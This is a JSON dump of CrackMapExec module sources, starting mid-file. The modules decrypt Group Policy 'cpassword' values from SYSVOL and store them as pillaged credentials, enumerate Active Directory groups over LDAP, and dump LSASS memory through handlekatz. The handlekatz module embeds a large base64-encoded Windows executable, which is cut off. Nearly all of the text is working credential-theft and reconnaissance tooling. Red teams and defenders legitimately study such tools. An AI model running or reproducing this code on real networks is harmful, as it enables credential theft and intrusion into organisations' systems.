\"Printers.xml\",\n \"Drives.xml\",\n ],\n )\n\n for path in paths:\n context.log.display(\"Found {}\".format(path))\n\n buf = BytesIO()\n connection.conn.getFile(\"SYSVOL\", path, buf.write)\n xml = ET.fromstring(buf.getvalue())\n sections = []\n\n if \"Groups.xml\" in path:\n sections.append(\"./User/Properties\")\n\n elif \"Services.xml\" in path:\n sections.append(\"./NTService/Properties\")\n\n elif \"ScheduledTasks.xml\" in path:\n sections.append(\"./Task/Properties\")\n sections.append(\"./ImmediateTask/Properties\")\n sections.append(\"./ImmediateTaskV2/Properties\")\n sections.append(\"./TaskV2/Properties\")\n\n elif \"DataSources.xml\" in path:\n sections.append(\"./DataSource/Properties\")\n\n elif \"Printers.xml\" in path:\n sections.append(\"./SharedPrinter/Properties\")\n\n elif \"Drives.xml\" in path:\n sections.append(\"./Drive/Properties\")\n\n for section in sections:\n xml_section = xml.findall(section)\n for attr in xml_section:\n props = attr.attrib\n\n if \"cpassword\" in props:\n for user_tag in [\n \"userName\",\n \"accountName\",\n \"runAs\",\n \"username\",\n ]:\n if user_tag in props:\n username = props[user_tag]\n\n password = self.decrypt_cpassword(props[\"cpassword\"])\n\n context.log.success(\"Found credentials in {}\".format(path))\n context.log.highlight(\"Password: {}\".format(password))\n for k, v in props.items():\n if k != \"cpassword\":\n context.log.highlight(\"{}: {}\".format(k, v))\n\n hostid = context.db.get_hosts(connection.host)[0][0]\n context.db.add_credential(\n \"plaintext\",\n \"\",\n username,\n password,\n pillaged_from=hostid,\n )\n\n def decrypt_cpassword(self, cpassword):\n # Stolen from hhttps://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385\n\n # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2\n key = unhexlify(\"4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b\")\n cpassword += \"=\" * ((4 - len(cpassword) % 4) % 4)\n password = b64decode(cpassword)\n IV = \"\\x00\" * 16\n decypted = AES.new(key, AES.MODE_CBC, IV.encode(\"utf8\")).decrypt(password)\n return decypted.decode().rstrip()\n" }, { "path": "cme/modules/group_members.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\n\nclass CMEModule:\n '''\n Module by CyberCelt: @Cyb3rC3lt\n\n Initial module:\n https://github.com/Cyb3rC3lt/CrackMapExec-Modules\n '''\n\n name = 'group-mem'\n description = 'Retrieves all the members within a Group'\n supported_protocols = ['ldap']\n opsec_safe = True\n multiple_hosts = False\n primaryGroupID = ''\n answers = []\n\n def options(self, context, module_options):\n '''\n group-mem: Specify group-mem to call the module\n GROUP: Specify the GROUP option to query for that group's members\n Usage: cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP=\"domain admins\"\n cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP=\"domain controllers\"\n '''\n\n self.GROUP = ''\n\n if 'GROUP' in module_options:\n self.GROUP = module_options['GROUP']\n else:\n context.log.error('GROUP option is required!')\n exit(1)\n\n def on_login(self, context, connection):\n\n #First look up the SID of the group passed in\n searchFilter = \"(&(objectCategory=group)(cn=\" + self.GROUP + \"))\"\n attribute = \"objectSid\"\n\n searchResult = doSearch(self, context, connection, searchFilter, attribute)\n #If no SID for the Group is returned exit the program\n if searchResult is None:\n context.log.success('Unable to find any members of the \"' + self.GROUP + '\" group')\n return True\n\n # Convert the binary SID to a primaryGroupID string to be used further\n sidString = connection.sid_to_str(searchResult).split(\"-\")\n self.primaryGroupID = sidString[-1]\n\n #Look up the groups DN\n searchFilter = \"(&(objectCategory=group)(cn=\" + self.GROUP + \"))\"\n attribute = \"distinguishedName\"\n distinguishedName = (doSearch(self, context, connection, searchFilter, attribute)).decode(\"utf-8\")\n\n # Carry out the search\n searchFilter = \"(|(memberOf=\"+distinguishedName+\")(primaryGroupID=\"+self.primaryGroupID+\"))\"\n attribute = \"sAMAccountName\"\n searchResult = doSearch(self, context, connection, searchFilter, attribute)\n\n if len(self.answers) > 0:\n context.log.success('Found the following members of the ' + self.GROUP + ' group:')\n for answer in self.answers:\n context.log.highlight(u'{}'.format(answer[0]))\n\n# Carry out an LDAP search for the Group with the supplied Group name\ndef doSearch(self,context, connection,searchFilter,attributeName):\n try:\n context.log.debug('Search Filter=%s' % searchFilter)\n resp = connection.ldapConnection.search(searchFilter=searchFilter,\n attributes=[attributeName],\n sizeLimit=0)\n context.log.debug('Total no. of records returned %d' % len(resp))\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n attributeValue = '';\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == attributeName:\n if attributeName == \"objectSid\":\n attributeValue = bytes(attribute['vals'][0])\n return attributeValue;\n elif attributeName == \"distinguishedName\":\n attributeValue = bytes(attribute['vals'][0])\n return attributeValue;\n else:\n attributeValue = str(attribute['vals'][0])\n if attributeValue is not None:\n self.answers.append([attributeValue])\n except Exception as e:\n context.log.debug(\"Exception:\", exc_info=True)\n context.log.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n except Exception as e:\n context.log.debug(\"Exception:\", e)\n return False\n" }, { "path": "cme/modules/groupmembership.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ldap import ldap as ldap_impacket\n\n\nclass CMEModule:\n \"\"\"\n Created as a contributtion from HackTheBox Academy team for CrackMapExec\n Reference: https://academy.hackthebox.com/module/details/84\n\n Module by @juliourena\n Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py\n \"\"\"\n\n name = \"groupmembership\"\n description = \"Query the groups to which a user belongs.\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n USER\tChoose a username to query group membership\n \"\"\"\n\n self.user = \"\"\n if \"USER\" in module_options:\n if module_options[\"USER\"] == \"\":\n context.log.fail(\"Invalid value for USER option!\")\n exit(1)\n self.user = module_options[\"USER\"]\n else:\n context.log.fail(\"Missing USER option, use --options to list available parameters\")\n exit(1)\n\n def on_login(self, context, connection):\n \"\"\"Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection\"\"\"\n # Building the search filter\n searchFilter = \"(&(objectClass=user)(sAMAccountName={}))\".format(self.user)\n\n try:\n context.log.debug(\"Search Filter=%s\" % searchFilter)\n resp = connection.ldapConnection.search(\n searchFilter=searchFilter,\n attributes=[\"memberOf\", \"primaryGroupID\"],\n sizeLimit=0,\n )\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find(\"sizeLimitExceeded\") >= 0:\n context.log.debug(\"sizeLimitExceeded exception caught, giving up and processing the data received\")\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n context.log.debug(e)\n return False\n\n memberOf = []\n primaryGroupID = \"\"\n\n context.log.debug(\"Total of records returned %d\" % len(resp))\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"primaryGroupID\":\n primaryGroupID = attribute[\"vals\"][0]\n # Hardcode value for Domain Users primary Group ID 513\n # For future improvement maybe we can query the primary ID value\n # Reference: https://social.technet.microsoft.com/Forums/Azure/en-US/373febac-665c-494d-91f7-834541c74bee/cant-get-all-member-objects-from-domain-users-in-ldap?forum=winserverDS\n if str(primaryGroupID) == \"513\":\n memberOf.append(\"CN=Domain Users,CN=Users,DC=XXXXX,DC=XXX\")\n elif str(attribute[\"type\"]) == \"memberOf\":\n for group in attribute[\"vals\"]:\n if isinstance(group._value, bytes):\n memberOf.append(str(group))\n\n except Exception as e:\n context.log.debug(\"Exception:\", exc_info=True)\n context.log.debug(\"Skipping item, cannot process due to error %s\" % str(e))\n pass\n if len(memberOf) > 0:\n context.log.success(\"User: {} is member of following groups: \".format(self.user))\n for group in memberOf:\n # Split the string on the \",\" character to get a list of the group name and parent group names\n group_parts = group.split(\",\")\n\n # The group name is the first element in the list, so we can extract it by taking the first element of the list\n # and splitting it on the \"=\" character to get a list of the group name and its prefix (e.g., \"CN\")\n group_name = group_parts[0].split(\"=\")[1]\n\n # print(\"Group name: %s\" % group_name)\n context.log.highlight(\"{}\".format(group_name))\n" }, { "path": "cme/modules/handlekatz.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# handlekatz module for CME python3\n# author of the module : github.com/mpgn\n# HandleKatz: https://github.com/codewhitesec/HandleKatz\n\nimport base64\nimport re\nimport sys\n\nfrom cme.helpers.bloodhound import add_user_bh\n\n\nclass CMEModule:\n name = \"handlekatz\"\n description = \"Get lsass dump using handlekatz64 and parse the result with pypykatz\"\n supported_protocols = [\"smb\"]\n opsec_safe = False\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n TMP_DIR Path where process dump should be saved on target system (default: C:\\\\Windows\\\\Temp\\\\)\n HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/)\n HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)\n DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)\n \"\"\"\n\n self.tmp_dir = \"C:\\\\Windows\\\\Temp\\\\\"\n self.share = \"C$\"\n self.tmp_share = self.tmp_dir.split(\":\")[1]\n self.handlekatz_embeded = base64.b64decode(\n \"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